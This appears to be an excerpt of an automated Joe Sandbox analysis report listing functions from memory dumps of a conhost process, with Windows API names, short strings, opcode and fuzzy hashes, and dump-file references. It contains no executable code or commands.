                                                                  • Opcode ID: b0319cbd86f06d073dcced0acdf6bc1c6042bb64f80e9fc0b828a3d11e191795
                                                                  • Instruction ID: ee4abd6b53e7e1360e352c12e4a443d4582f028ca2cad071ee549152e69d5c41
                                                                  • Opcode Fuzzy Hash: b0319cbd86f06d073dcced0acdf6bc1c6042bb64f80e9fc0b828a3d11e191795
                                                                  • Instruction Fuzzy Hash: 69318D32709B618AEF50DF96F9947AAA3E2FB54B80F0840248F4847B65FF38D4759700
                                                                  Function 0000014ECB4AD3D0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetLastError.KERNEL32(?,?,?,0000014ECB4ADAE5,?,?,?,?,0000014ECB4ADBA8), ref: 0000014ECB4AD3DF
                                                                  • FlsSetValue.KERNEL32(?,?,?,0000014ECB4ADAE5,?,?,?,?,0000014ECB4ADBA8), ref: 0000014ECB4AD415
                                                                  • FlsSetValue.KERNEL32(?,?,?,0000014ECB4ADAE5,?,?,?,?,0000014ECB4ADBA8), ref: 0000014ECB4AD442
                                                                  • FlsSetValue.KERNEL32(?,?,?,0000014ECB4ADAE5,?,?,?,?,0000014ECB4ADBA8), ref: 0000014ECB4AD453
                                                                  • FlsSetValue.KERNEL32(?,?,?,0000014ECB4ADAE5,?,?,?,?,0000014ECB4ADBA8), ref: 0000014ECB4AD464
                                                                  • SetLastError.KERNEL32(?,?,?,0000014ECB4ADAE5,?,?,?,?,0000014ECB4ADBA8), ref: 0000014ECB4AD47F
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Value$ErrorLast
                                                                  • String ID:
                                                                  • API String ID: 2506987500-0
                                                                  • Opcode ID: 7fc5e4c2f951738899047b95e00f4424a4026db9f78df7ad039e65ab4a94a20b
                                                                  • Instruction ID: d9cd7472ae20f1cfecc0355ec7d51c513d08cf06d2b1364651a82dcf923acab8
                                                                  • Opcode Fuzzy Hash: 7fc5e4c2f951738899047b95e00f4424a4026db9f78df7ad039e65ab4a94a20b
                                                                  • Instruction Fuzzy Hash: 4D115E7430D6B08AFE64972275C53E961D67B48BF0F144324AB3647AF6FB28D421A200
                                                                  Function 0000014ECB4A1934 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                  • String ID:
                                                                  • API String ID: 517849248-0
                                                                  • Opcode ID: b82d1bbac2a4a5b9d6dbe5f2df15dcec51c980f52b633491719cdad5f7bdf37e
                                                                  • Instruction ID: dac20ba40e4ab18405f106993ada258ddb34ec7eb8b8d334af9d18a2e780dfa7
                                                                  • Opcode Fuzzy Hash: b82d1bbac2a4a5b9d6dbe5f2df15dcec51c980f52b633491719cdad5f7bdf37e
                                                                  • Instruction Fuzzy Hash: B3011731708A408AEE14DB12B898799A2E5F788FC0F484134DF8A83768EF38C989D740
                                                                  Function 0000014ECB4A3B0C Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                  • String ID:
                                                                  • API String ID: 449555515-0
                                                                  • Opcode ID: 8662155c9f7376030badf6deb1f9cc8df7edcdadcbb5a73039a50034e0df76dd
                                                                  • Instruction ID: daa1f254b24549814455c8832ccdf00eccf9ee84d069f52ed4131b42f87bfcc6
                                                                  • Opcode Fuzzy Hash: 8662155c9f7376030badf6deb1f9cc8df7edcdadcbb5a73039a50034e0df76dd
                                                                  • Instruction Fuzzy Hash: 34011735619B448AEF249B26F88879AB3E1BB59B45F040428CF4D467B6FF3DC458A700
                                                                  Function 0000014ECB478835 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 135COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000003.1816877183.0000014ECB470000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014ECB470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_3_14ecb470000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                  • String ID: displacement map'$csm$f
                                                                  • API String ID: 3242871069-3478954885
                                                                  • Opcode ID: 911b6d09506e82739bdc666af230172d8f47b592f6a0b26bc0314746b579121d
                                                                  • Instruction ID: 33f1637741e2313f0f6f6dcb5c428a236f5c974285f55f870c9bc43a16145b1b
                                                                  • Opcode Fuzzy Hash: 911b6d09506e82739bdc666af230172d8f47b592f6a0b26bc0314746b579121d
                                                                  • Instruction Fuzzy Hash: A451AB727196008EEF54CB26F484B9937E5F390B9AF518125DB86637A8FB35C841E701
                                                                  Function 0000014ECB4A9435 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 135COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                  • String ID: csm$f
                                                                  • API String ID: 2395640692-629598281
                                                                  • Opcode ID: 911b6d09506e82739bdc666af230172d8f47b592f6a0b26bc0314746b579121d
                                                                  • Instruction ID: 965eb8a26f9da2d3bec19079d3500027326f479bd9ad565bcb908c9c5e6603b4
                                                                  • Opcode Fuzzy Hash: 911b6d09506e82739bdc666af230172d8f47b592f6a0b26bc0314746b579121d
                                                                  • Instruction Fuzzy Hash: A751AB336196208EEF18CB25F488BD933E9F340B98F518124DB16877A8FB35C961E704
                                                                  Function 0000014ECB478818 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 75COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000003.1816877183.0000014ECB470000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014ECB470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_3_14ecb470000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                  • String ID: displacement map'$csm$f
                                                                  • API String ID: 3242871069-3478954885
                                                                  • Opcode ID: 83240c1be95a85a2168ddca1a7ce1f874f475d626e55e81d58b9bdf2105a26fb
                                                                  • Instruction ID: a8e0203c589ca72d3ee40062dc9da409cd1db6d1748801c39dac5d0965335795
                                                                  • Opcode Fuzzy Hash: 83240c1be95a85a2168ddca1a7ce1f874f475d626e55e81d58b9bdf2105a26fb
                                                                  • Instruction Fuzzy Hash: 29319C322197408EEF14DF22F884B9937E4F340B99F558014EF96537A5EB39C941E704
                                                                  Function 0000014ECB4A9418 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                  • String ID: csm$f
                                                                  • API String ID: 2395640692-629598281
                                                                  • Opcode ID: cd5e78f7a824d61b6a4bd1de3076d2d48bd843f6231fa7e8b66aa639a396b76c
                                                                  • Instruction ID: c94268d2ef066480d23149efd2f8e31cb5ea7c4b2a23974b180cd3b2ddb0bbbc
                                                                  • Opcode Fuzzy Hash: cd5e78f7a824d61b6a4bd1de3076d2d48bd843f6231fa7e8b66aa639a396b76c
                                                                  • Instruction Fuzzy Hash: E1319132209A609EEF14DF15F888BDA77E8F340B88F558014AF56477A8EB38C961E704
                                                                  Function 0000014ECB4A19D8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: FinalHandleNamePathlstrlen
                                                                  • String ID: \\?\
                                                                  • API String ID: 2719912262-4282027825
                                                                  • Opcode ID: d5ec68f96dae6b7ecf4cdbbeb250ae8ba7b628e03b919f4631671672637286c6
                                                                  • Instruction ID: 4a3d00bd609ffdeb84294fe8d25642d74be7a577b0e3eb28c1f44204beb739b7
                                                                  • Opcode Fuzzy Hash: d5ec68f96dae6b7ecf4cdbbeb250ae8ba7b628e03b919f4631671672637286c6
                                                                  • Instruction Fuzzy Hash: 15F06872348A819AEF208F21F5D47D9A3A0F744B98F844020DB4986974EF7CC648D700
                                                                  Function 0000014ECB4A330C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: CombinePath
                                                                  • String ID: \\.\pipe\
                                                                  • API String ID: 3422762182-91387939
                                                                  • Opcode ID: e19f02f46d5f5175cba9bea6f0663c254bbceec99479fcaac31b51916b51a9ba
                                                                  • Instruction ID: d70698dd1dcf4f203e29825757f32f0de361c7d4eb8d0262746d17ba847ee2c5
                                                                  • Opcode Fuzzy Hash: e19f02f46d5f5175cba9bea6f0663c254bbceec99479fcaac31b51916b51a9ba
                                                                  • Instruction Fuzzy Hash: 29F0F87521CB9086EE149B17B99419AA6A5BB48FC0F08A021EF5A87B28EF38C455D700
                                                                  Function 0000014ECB4AC0C8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                  • API String ID: 4061214504-1276376045
                                                                  • Opcode ID: 98eb24e4d57f1585c54f2d3d16aa4b08ded3b1fa128793edf9192e1fe004f7b7
                                                                  • Instruction ID: efef181d9041e5bdc727d28c784f1bc4dc17641553488d2d864364fdb4984d0b
                                                                  • Opcode Fuzzy Hash: 98eb24e4d57f1585c54f2d3d16aa4b08ded3b1fa128793edf9192e1fe004f7b7
                                                                  • Instruction Fuzzy Hash: A1F09671319E0089FF148B24F8C43A963A0FB44BA5F541219C76A852F4EF3CC049E700
                                                                  Function 0000014ECB4A5500 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentThread
                                                                  • String ID:
                                                                  • API String ID: 2882836952-0
                                                                  • Opcode ID: 758a31af71cbbd98710326f5d5dd73fd8f3faa0c353224d70a8a3d8e98f497e1
                                                                  • Instruction ID: f683c3630e1b7a44d7615040bde159651ae2f9df42aeb2fcfa7e2f913512e2f9
                                                                  • Opcode Fuzzy Hash: 758a31af71cbbd98710326f5d5dd73fd8f3faa0c353224d70a8a3d8e98f497e1
                                                                  • Instruction Fuzzy Hash: 3702CA3621DB948AEB60CB59F59439AB7E0F3C4794F100115EB8E87BA8EB7DC854DB00
                                                                  Function 0000014ECB4A5B40 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentThread
                                                                  • String ID:
                                                                  • API String ID: 2882836952-0
                                                                  • Opcode ID: a4c708464c669e8ac6b2107c0414dd5148c6b67da4caf1212569ceb4eb7b4d9f
                                                                  • Instruction ID: b704e71cc39e87cb397920f7996481d8c0980000fd8d472db17156e02ddbc5dc
                                                                  • Opcode Fuzzy Hash: a4c708464c669e8ac6b2107c0414dd5148c6b67da4caf1212569ceb4eb7b4d9f
                                                                  • Instruction Fuzzy Hash: 8861C83651DA54CAEB609B16F58439AB7E0F388B84F504115EB8E47BB8EB7DC950DF00
                                                                  Function 0000014ECB483934 Relevance: 7.6, APIs: 5, Instructions: 56COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000003.1816877183.0000014ECB470000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014ECB470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_3_14ecb470000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: _set_statfp
                                                                  • String ID:
                                                                  • API String ID: 1156100317-0
                                                                  • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                  • Instruction ID: 043c364b9d4a95e6fd3743d88b1ccff48b5b7db012de15f136be2776490f4f74
                                                                  • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                  • Instruction Fuzzy Hash: 9411A332A1CB104DFE541768F4C63EB31E2FB55374F050634BB66C72FAFA6A8884A181
                                                                  Function 0000014ECB4B4534 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: _set_statfp
                                                                  • String ID:
                                                                  • API String ID: 1156100317-0
                                                                  • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                  • Instruction ID: 43cef54a3338e55a7097a972b6d8bc0f3c9d209b2646d3ad7563f1e9377f18e5
                                                                  • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                  • Instruction Fuzzy Hash: 3311AC72A1CE0049FE641768F4C6BE911D0BF593B8F494624EB76C76FAEA2888456200
                                                                  Function 0000014ECB4AAE4C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: CallEncodePointerTranslator
                                                                  • String ID: MOC$RCC
                                                                  • API String ID: 3544855599-2084237596
                                                                  • Opcode ID: 05fb19cb5d958d360e5f46d501e280b4416caeae58329d8bd7a5de4c8cbcf2a2
                                                                  • Instruction ID: 460ecc503d2186cdbbd2e73aa9df040e9b1c53d1ffdd33e31d4b14a253e26d45
                                                                  • Opcode Fuzzy Hash: 05fb19cb5d958d360e5f46d501e280b4416caeae58329d8bd7a5de4c8cbcf2a2
                                                                  • Instruction Fuzzy Hash: E0618C73608B948AEB64DF65E4803ED7BE0F348B88F044215EF5917BA9EB38D5A5D700
                                                                  Function 0000014ECB47A5A8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000003.1816877183.0000014ECB470000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014ECB470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_3_14ecb470000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                  • String ID: csm$csm
                                                                  • API String ID: 3896166516-3733052814
                                                                  • Opcode ID: 92a9139125581d210e17e0e512ec335e12b84a8ad252812ef56c38af1cf641ca
                                                                  • Instruction ID: 8ca3eb69dc5922fec1d8d39842d0dbfe659504a2b72b01adb7ae290cdae52f62
                                                                  • Opcode Fuzzy Hash: 92a9139125581d210e17e0e512ec335e12b84a8ad252812ef56c38af1cf641ca
                                                                  • Instruction Fuzzy Hash: 20517D32108380CEEF748F26A58439977E0F354B99F145116EB99A7BE5EB38D461EB01
                                                                  Function 0000014ECB4AB1A8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                  • String ID: csm$csm
                                                                  • API String ID: 3896166516-3733052814
                                                                  • Opcode ID: 92a9139125581d210e17e0e512ec335e12b84a8ad252812ef56c38af1cf641ca
                                                                  • Instruction ID: 00f61466da1fde8208a06350e0743895f8a66b9fa396c11e96be43c9fd2544ef
                                                                  • Opcode Fuzzy Hash: 92a9139125581d210e17e0e512ec335e12b84a8ad252812ef56c38af1cf641ca
                                                                  • Instruction Fuzzy Hash: DD517C322086A0CEEF649FA5B4943AC77E0F355B84F144216DB8987BE5EB38D4B1E701
                                                                  Function 0000014ECB4A3554 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                  • String ID: pid_
                                                                  • API String ID: 517849248-4147670505
                                                                  • Opcode ID: 003ff62f248625063318c3f9e3d6e241277a7bda76ff5f02da447dbddd7f43fe
                                                                  • Instruction ID: 6ff53002e7311ccbc260ff3840f4a39f3f0bf47876e1bfb530d94f5637898aff
                                                                  • Opcode Fuzzy Hash: 003ff62f248625063318c3f9e3d6e241277a7bda76ff5f02da447dbddd7f43fe
                                                                  • Instruction Fuzzy Hash: A5113D31318A619AFF609B29F8853DA62E5F785780F944135AB49C3BB4FF38C925E740
                                                                  Function 0000014ECB4B2488 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
